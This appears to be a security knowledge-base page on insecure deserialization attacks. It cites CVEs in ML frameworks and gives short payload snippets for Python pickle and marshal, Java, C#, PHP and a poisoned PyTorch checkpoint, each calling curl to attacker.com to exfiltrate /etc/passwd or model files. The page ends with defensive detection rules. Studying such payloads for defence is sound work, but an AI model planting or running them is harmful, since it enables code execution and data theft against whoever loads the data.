Skip to content

Insecure Deserialization Exploitation

Insecure Deserialization Exploitation occurs during the Payload Execution phase when attackers leverage vulnerabilities in how applications deserialize objects to execute malicious code remotely. This sub-technique involves manipulating serialized data structures (JSON, XML, binary formats, etc.) that are consumed by the target application, injecting malicious code that executes during the deserialization process. When a vulnerable application deserializes attacker-controlled input without proper validation or sanitization, the application reconstructs objects while potentially invoking methods and class constructors that can be chained together to create "gadgets" - sequences of code that perform malicious operations. Attackers commonly target popular programming languages and frameworks with native deserialization mechanisms including Java, PHP, .NET, Python, and Ruby to achieve arbitrary code execution, manipulate application logic, escalate privileges, or pivot deeper into target environments. Successful exploitation can lead to complete system compromise as the code typically executes with the same privileges as the application process handling the deserialization.

Examples in the Wild

Notable Deserialization Attacks:

TensorRT-LLM (CVE-2025-23254) A critical vulnerability in NVIDIA's TensorRT-LLM framework: - Affected versions prior to 0.18.2 - Allowed code execution via ZeroMqQueue deserialization - Could lead to information disclosure and data tampering - Required local access to TRTLLM server

Meta-Llama (CVE-2024-50050) A deserialization vulnerability in Meta's Llama framework: - Affected model loading and checkpoint mechanisms - Allowed arbitrary code execution during model deserialization - Impacted major LLM deployments and fine-tuning pipelines - Required emergency patching of deployment systems

ShellTorch (CVE-2023-43654) The ShellTorch attack demonstrated sophisticated exploitation of Python's pickle deserialization in PyTorch's model loading functionality: - Exploited pickle's code execution capabilities in model loading - Achieved remote code execution on major cloud AI platforms - Combined with YAML deserialization for enhanced impact - Led to widespread model and data theft

ShadowRay Attack The ShadowRay attack exploited pickle deserialization in Ray's distributed training: - Compromised model checkpointing mechanisms - Exploited distributed training pipelines - Achieved cross-node code execution - Exfiltrated proprietary models and training data

MLflow RCE (CVE-2023-1177) A critical vulnerability in MLflow's model loading: - Affected MLflow versions before 2.2.1 - Allowed arbitrary code execution via pickle - Impacted major ML deployment platforms - Required complete infrastructure rebuilds

Spring4Shell (CVE-2022-22965) A critical vulnerability in Spring Framework's data binding: - Affected Spring Framework 5.3.0 to 5.3.17 - Allowed remote code execution via malicious deserialization - Impacted numerous enterprise Java applications - Required emergency patching across industries

Attack Mechanism

Common Deserialization Exploitation Techniques:

  1. Python Pickle and Marshal Exploitation 

    import pickle
import marshal
import os

# Pickle exploitation
class MaliciousPickle:
    def __reduce__(self):
        return (os.system, ('curl http://attacker.com/exfil?data=$(cat /etc/passwd)',))

# Create malicious pickle
pickle_payload = pickle.dumps(MaliciousPickle())

# Marshal exploitation (more dangerous as it can serialize code objects)
def malicious_function():
    return os.system('curl http://attacker.com/exfil')

marshal_payload = marshal.dumps(malicious_function.__code__)

# When victim loads:
# pickle.loads(pickle_payload)  # Executes malicious command
# exec(marshal.loads(marshal_payload))  # Executes malicious code

  2. Java Deserialization and ScriptEngine 

    // Malicious Java object
public class Evil implements Serializable {
    private void readObject(ObjectInputStream in) throws Exception {
        Runtime.getRuntime().exec("curl http://attacker.com/exfil");
    }
}

// ScriptEngine exploitation
ScriptEngineManager manager = new ScriptEngineManager();
ScriptEngine engine = manager.getEngineByName("javascript");
engine.eval("java.lang.Runtime.getRuntime().exec('curl http://attacker.com/exfil')");

// Reflection-based exploitation
Method method = Class.forName("java.lang.Runtime")
    .getMethod("getRuntime")
    .invoke(null);
method.getClass()
    .getMethod("exec", String.class)
    .invoke(method, "curl http://attacker.com/exfil");

  3. C# Deserialization and Reflection 

    // BinaryFormatter deserialization (dangerous)
public class Evil : ISerializable {
    public void GetObjectData(SerializationInfo info, StreamingContext context) {
        info.AddValue("cmd", "curl http://attacker.com/exfil");
    }

    public Evil(SerializationInfo info, StreamingContext context) {
        string cmd = info.GetString("cmd");
        System.Diagnostics.Process.Start("cmd.exe", "/c " + cmd);
    }
}

// Reflection-based exploitation
Assembly assembly = Assembly.Load("System.Management.Automation");
Type psType = assembly.GetType("System.Management.Automation.PowerShell");
MethodInfo addScript = psType.GetMethod("AddScript");
object ps = Activator.CreateInstance(psType);
addScript.Invoke(ps, new object[] { "curl http://attacker.com/exfil" });

  4. PHP Object Injection 

    class Exploit {
    public $cmd = 'system("curl http://attacker.com/exfil");';
    public function __wakeup() {
        eval($this->cmd);
    }
}

// Create malicious serialized data
$payload = serialize(new Exploit());

  5. ML Model Poisoning 

    import torch
import pickle

class PoisonedModel:
    def __reduce__(self):
        cmd = 'curl -X POST http://attacker.com/exfil --data-binary @model.pt'
        return (os.system, (cmd,))

# Inject into model checkpoint
model_state = {
    'weights': torch.randn(10, 10),
    'metadata': PoisonedModel()
}
torch.save(model_state, 'model.pt')  # Uses pickle by default

Detection Challenges

Why Traditional Security Tools Fail:

  1. Language-Specific Complexity 

    # Deserialization mechanisms
challenges:
  - python_pickle: "arbitrary code execution"
  - java_readObject: "method invocation"
  - php_unserialize: "magic methods"
  # How to handle all formats?

  2. Framework Integration 

    # Framework usage
framework_challenges:
  - spring_data_binding: "complex objects"
  - django_sessions: "pickle storage"
  - ml_frameworks: "model serialization"
  # How to secure without breaking?

  3. Distribution Issues 

    # Distributed systems
distribution_challenges:
  - service_boundaries: "trust zones"
  - data_pipelines: "serialization points"
  - storage_systems: "persistence security"
  # Where to implement controls?

Required Application Security Strategy: 

# Deserialization protection
- rule: "Input Validation"
  condition: |
    data.source_untrusted AND
    format.allows_code_execution AND
    context.deserializes_data
  severity: critical

# Framework security
- rule: "Framework Control"
  condition: |
    framework.uses_serialization OR
    framework.stores_serialized_data OR
    framework.transmits_objects
  severity: high

# Runtime monitoring
- rule: "Execution Control"
  condition: |
    deserialization.invokes_dangerous_method OR
    deserialization.loads_external_class OR
    deserialization.executes_code
  severity: critical

Key Detection Requirements:

  1. Input Validation
  2. Format verification
  3. Schema validation

  4. Type checking

  5. Runtime Analysis

  6. Method invocation tracking
  7. Class loading monitoring

  8. Code execution detection

  9. Framework Controls

  10. Safe deserialization modes
  11. Allowlist-based deserialization
  12. Serialization format enforcement
References & Resources

Official Sources:

  1. OWASP Deserialization Cheat Sheet
  2. Python Pickle Security
  3. Java Serialization Filtering
  4. PHP Object Injection

Technical Analysis:

  1. Exploiting Java Deserialization
  2. Machine Learning Security
  3. Spring Framework Security